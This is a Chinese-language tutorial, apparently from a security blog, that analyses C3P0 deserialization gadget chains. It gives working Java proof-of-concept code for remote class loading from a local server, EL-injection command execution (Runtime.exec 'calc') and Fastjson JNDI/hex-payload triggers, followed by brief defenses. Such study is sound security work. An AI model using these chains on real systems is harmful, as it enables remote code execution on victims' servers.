Java安全-C3P0反序列化漏洞分析与利用<\/h1>

1. C3P0简介<\/h2>
C3P0是一个用于创建和管理数据库连接的开源JDBC连接池库，主要功能包括：<\/p>
连接池管理<\/li>
连接数控制<\/li>
连接可靠性测试<\/li>
连接泄露控制<\/li>
缓存语句功能<\/li> <\/ul>
2. 原生反序列化利用 - 远程加载类<\/h2>

2.1 利用链分析<\/h3>
关键类：PoolBackedDataSourceBase<\/code><\/p>

实现了IdentityTokenized<\/code>接口，用于支持注册功能<\/li>
每个DataSource实例都有一个identityToken<\/code>用于在C3P0Registry中注册<\/li>
持有PropertyChangeSupport<\/code>和VetoableChangeSupport<\/code>对象<\/li>
<\/ul>
序列化机制：<\/p>

序列化时需要存储connectionPoolDataSource<\/code>属性<\/li>
如果该属性不可序列化，会使用ReferenceIndirector.indirectForm<\/code>方法

调用Referenceable<\/code>对象的getReference<\/code>方法获取Reference<\/code>对象<\/li>
生成可序列化的IndirectlySerialized<\/code>对象（ReferenceSerialized<\/code>）<\/li>
<\/ul>
<\/li>
<\/ul>
反序列化时：<\/p>

如果是IndirectlySerialized<\/code>对象，会调用getObject<\/code>方法重新生成connectionPoolDataSource<\/code>对象<\/li>
<\/ul>
2.2 关键利用点<\/h3>
ReferenceableUtils.referenceToObject<\/code>方法：<\/p>
public<\/span> static<\/span> Object referenceToObject<\/span>(<\/span>Reference ref,<\/span> Name name,<\/span> Context nameCtx,<\/span> Hashtable env)<\/span> throws<\/span> NamingException {<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    URL u =<\/span> new<\/span> URL(<\/span>fClassLocation);<\/span>
<\/span><\/span>    cl =<\/span> new<\/span> URLClassLoader(<\/span>new<\/span> URL[]<\/span> {<\/span> u },<\/span> defaultClassLoader);<\/span>
<\/span><\/span>    Class fClass =<\/span> Class.<\/span>forName<\/span>(<\/span>fClassName,<\/span> true<\/span>,<\/span> cl);<\/span>
<\/span><\/span>    ObjectFactory of =<\/span> (<\/span>ObjectFactory)<\/span> fClass.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>    return<\/span> of.<\/span>getObjectInstance<\/span>(<\/span>ref,<\/span> name,<\/span> nameCtx,<\/span> env);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.3 Payload构造<\/h3>
需要创建一个实现了Referenceable<\/code>和ConnectionPoolDataSource<\/code>接口但不实现Serializable<\/code>的类：<\/p>
private<\/span> static<\/span> class<\/span> ConnectionPool<\/span> implements<\/span> ConnectionPoolDataSource,<\/span> Referenceable {<\/span>
<\/span><\/span>    protected<\/span> String classFactory;<\/span>
<\/span><\/span>    protected<\/span> String classFactoryLocation;<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> ConnectionPool<\/span>(<\/span>String classFactory,<\/span> String classFactoryLocation)<\/span> {<\/span>
<\/span><\/span>        this<\/span>.<\/span>classFactory<\/span> =<\/span> classFactory;<\/span>
<\/span><\/span>        this<\/span>.<\/span>classFactoryLocation<\/span> =<\/span> classFactoryLocation;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> Reference getReference<\/span>()<\/span> throws<\/span> NamingException {<\/span>
<\/span><\/span>        return<\/span> new<\/span> Reference(<\/span>"ref"<\/span>,<\/span> classFactory,<\/span> classFactoryLocation);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ 其他方法实现...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>完整利用代码：<\/p>
public<\/span> class<\/span> c3p0SerDemo<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Constructor constructor =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase"<\/span>).<\/span>getDeclaredConstructor<\/span>();<\/span>
<\/span><\/span>        constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        PoolBackedDataSourceBase obj =<\/span> (<\/span>PoolBackedDataSourceBase)<\/span> constructor.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        ConnectionPool connectionPool =<\/span> new<\/span> ConnectionPool(<\/span>"Evil"<\/span>,<\/span> "http:\/\/127.0.0.1:8888\/"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        Field field =<\/span> PoolBackedDataSourceBase.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"connectionPoolDataSource"<\/span>);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>obj,<\/span> connectionPool);<\/span>
<\/span><\/span>        
<\/span><\/span>        ByteArrayOutputStream byteArrayOutputStream =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>        ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>byteArrayOutputStream);<\/span>
<\/span><\/span>        objectOutputStream.<\/span>writeObject<\/span>(<\/span>obj);<\/span>
<\/span><\/span>        objectOutputStream.<\/span>close<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>new<\/span> String(<\/span>Base64.<\/span>getEncoder<\/span>().<\/span>encode<\/span>(<\/span>byteArrayOutputStream.<\/span>toByteArray<\/span>())));<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. 不出网利用<\/h2>
3.1 利用原理<\/h3>
利用org.apache.naming.factory.BeanFactory<\/code>类的getObjectInstance<\/code>方法：<\/p>
@Override<\/span>
<\/span><\/span>public<\/span> Object getObjectInstance<\/span>(<\/span>Object obj,<\/span> Name name,<\/span> Context nameCtx,<\/span> Hashtable<?,?><\/span> environment)<\/span> throws<\/span> NamingException {<\/span>
<\/span><\/span>    if<\/span> (<\/span>obj instanceof<\/span> ResourceRef)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Reference ref =<\/span> (<\/span>Reference)<\/span> obj;<\/span>
<\/span><\/span>            String beanClassName =<\/span> ref.<\/span>getClassName<\/span>();<\/span>
<\/span><\/span>            Class<?><\/span> beanClass =<\/span> null<\/span>;<\/span>
<\/span><\/span>            \/\/ 加载类...
<\/span><\/span><\/span><\/span>            Object bean =<\/span> beanClass.<\/span>getConstructor<\/span>().<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 处理forceString属性
<\/span><\/span><\/span><\/span>            RefAddr ra =<\/span> ref.<\/span>get<\/span>(<\/span>"forceString"<\/span>);<\/span>
<\/span><\/span>            Map<<\/span>String,<\/span> Method><\/span> forced =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>            if<\/span> (<\/span>ra !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>                String value =<\/span> (<\/span>String)<\/span> ra.<\/span>getContent<\/span>();<\/span>
<\/span><\/span>                Class<?><\/span> paramTypes[]<\/span> =<\/span> new<\/span> Class[<\/span>1<\/span>];<\/span>
<\/span><\/span>                paramTypes[<\/span>0<\/span>]<\/span> =<\/span> String.<\/span>class<\/span>;<\/span>
<\/span><\/span>                \/\/ 解析forceString配置...
<\/span><\/span><\/span><\/span>            }<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 反射调用方法
<\/span><\/span><\/span><\/span>            Enumeration<<\/span>RefAddr><\/span> e =<\/span> ref.<\/span>getAll<\/span>();<\/span>
<\/span><\/span>            while<\/span> (<\/span>e.<\/span>hasMoreElements<\/span>())<\/span> {<\/span>
<\/span><\/span>                ra =<\/span> e.<\/span>nextElement<\/span>();<\/span>
<\/span><\/span>                String propName =<\/span> ra.<\/span>getType<\/span>();<\/span>
<\/span><\/span>                \/\/ 过滤特定属性...
<\/span><\/span><\/span><\/span>                value =<\/span> (<\/span>String)<\/span> ra.<\/span>getContent<\/span>();<\/span>
<\/span><\/span>                Method method =<\/span> forced.<\/span>get<\/span>(<\/span>propName);<\/span>
<\/span><\/span>                if<\/span> (<\/span>method !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>                    valueArray[<\/span>0<\/span>]<\/span> =<\/span> value;<\/span>
<\/span><\/span>                    method.<\/span>invoke<\/span>(<\/span>bean,<\/span> valueArray);<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            return<\/span> bean;<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            \/\/ 异常处理...
<\/span><\/span><\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> null<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2 利用javax.el.ELProcessor<\/code><\/h3>
Demo代码：<\/p>
public<\/span> class<\/span> c3p0UnserDemo<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        RefAddr forceStringAddr =<\/span> new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=eval"<\/span>);<\/span>
<\/span><\/span>        RefAddr xStringAddr =<\/span> new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> 
<\/span><\/span>            "''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass())"<\/span> +<\/span>
<\/span><\/span>            ".invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'calc')"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        Reference ref =<\/span> new<\/span> ResourceRef(<\/span>"javax.el.ELProcessor"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span>        ref.<\/span>add<\/span>(<\/span>forceStringAddr);<\/span>
<\/span><\/span>        ref.<\/span>add<\/span>(<\/span>xStringAddr);<\/span>
<\/span><\/span>        
<\/span><\/span>        ObjectFactory beanFactory =<\/span> new<\/span> BeanFactory();<\/span>
<\/span><\/span>        beanFactory.<\/span>getObjectInstance<\/span>(<\/span>ref,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.3 反序列化构造<\/h3>
修改getReference<\/code>方法：<\/p>
@Override<\/span>
<\/span><\/span>public<\/span> Reference getReference<\/span>()<\/span> throws<\/span> NamingException {<\/span>
<\/span><\/span>    RefAddr forceStringAddr =<\/span> new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=eval"<\/span>);<\/span>
<\/span><\/span>    RefAddr xStringAddr =<\/span> new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> 
<\/span><\/span>        "''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass())"<\/span> +<\/span>
<\/span><\/span>        ".invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'calc')"<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    Reference ref =<\/span> new<\/span> ResourceRef(<\/span>"javax.el.ELProcessor"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> false<\/span>,<\/span> classFactory,<\/span> classFactoryLocation);<\/span>
<\/span><\/span>    ref.<\/span>add<\/span>(<\/span>forceStringAddr);<\/span>
<\/span><\/span>    ref.<\/span>add<\/span>(<\/span>xStringAddr);<\/span>
<\/span><\/span>    return<\/span> ref;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. Fastjson中的利用<\/h2>
4.1 JNDI注入<\/h3>
利用类：com.mchange.v2.c3p0.JndiRefForwardingDataSource<\/code><\/p>
关键点：<\/p>

设置jndiName<\/code>属性<\/li>
设置loginTimeout<\/code>属性触发inner()<\/code>方法调用<\/li>
<\/ul>
4.2 二次反序列化<\/h3>
4.2.1 关键类与机制<\/h4>

VetoableChangeListener<\/code>：监听器接口，当受约束属性改变时调用vetoableChange<\/code>方法<\/li>
VetoableChangeSupport<\/code>：管理监听器列表，发送PropertyChangeEvent<\/code><\/li>
PropertyChangeEvent<\/code>：存储Bean属性名和新旧值<\/li>
<\/ul>
4.2.2 利用链分析<\/h4>
关键类：WrapperConnectionPoolDataSource<\/code><\/p>
初始化时调用setUpPropertyListeners<\/code>方法设置属性监听：<\/p>
public<\/span> void<\/span> vetoableChange<\/span>(<\/span>PropertyChangeEvent evt)<\/span> throws<\/span> PropertyVetoException {<\/span>
<\/span><\/span>    String propName =<\/span> evt.<\/span>getPropertyName<\/span>();<\/span>
<\/span><\/span>    Object val =<\/span> evt.<\/span>getNewValue<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    if<\/span> (<\/span>"connectionTesterClassName"<\/span>.<\/span>equals<\/span>(<\/span>propName))<\/span> {<\/span>
<\/span><\/span>        \/\/ 处理connectionTesterClassName...
<\/span><\/span><\/span><\/span>    }<\/span> else<\/span> if<\/span> (<\/span>"userOverridesAsString"<\/span>.<\/span>equals<\/span>(<\/span>propName))<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            WrapperConnectionPoolDataSource.<\/span>this<\/span>.<\/span>userOverrides<\/span> =<\/span> 
<\/span><\/span>                C3P0ImplUtils.<\/span>parseUserOverridesAsString<\/span>((<\/span>String)<\/span> val);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> PropertyVetoException(<\/span>"Failed to parse stringified userOverrides. "<\/span> +<\/span> val,<\/span> evt);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>C3P0ImplUtils.parseUserOverridesAsString<\/code>处理流程：<\/p>

截取HexAsciiSerializedMap:<\/code>后的hex字符串<\/li>
解码hex字符串<\/li>
反序列化解码后的数据<\/li>
<\/ol>
4.2.3 利用方式<\/h4>
通过设置userOverridesAsString<\/code>属性触发反序列化：<\/p>
\/\/ 构造形如 HexAsciiSerializedMap:hex_code; 的字符串
<\/span><\/span><\/span><\/span>String payload =<\/span> "HexAsciiSerializedMap:aced...;"<\/span>;<\/span>
<\/span><\/span>wrapperConnectionPoolDataSource.<\/span>setUserOverridesAsString<\/span>(<\/span>payload);<\/span>
<\/span><\/span><\/code><\/pre>5. 防御措施<\/h2>

升级C3P0到最新版本<\/li>
限制反序列化操作，使用白名单控制可反序列化的类<\/li>
配置Java安全策略，限制URLClassLoader加载远程代码<\/li>
在JDK高版本中利用trustCodebaseURL<\/code>限制<\/li>
<\/ol>
6. 参考链接<\/h2>

ysoserial C3P0 payload<\/a><\/li>
Fastjson C3P0利用<\/a><\/li>
Java Beans VetoableChangeSupport文档<\/a><\/li>
C3P0不出网利用<\/a><\/li>
<\/ol>
Java安全-C3P0反序列化漏洞分析与利用<\/h1>

2. 原生反序列化利用 - 远程加载类<\/h2>

3. 不出网利用<\/h2>

4. Fastjson中的利用<\/h2>

4.2 二次反序列化<\/h3>

6. 参考链接<\/h2> ysoserial C3P0 payload<\/a><\/li> Fastjson C3P0利用<\/a><\/li> Java Beans VetoableChangeSupport文档<\/a><\/li> C3P0不出网利用<\/a><\/li> <\/ol>

6. 参考链接<\/h2>

ysoserial C3P0 payload<\/a><\/li>
Fastjson C3P0利用<\/a><\/li>
Java Beans VetoableChangeSupport文档<\/a><\/li>
C3P0不出网利用<\/a><\/li> <\/ol>
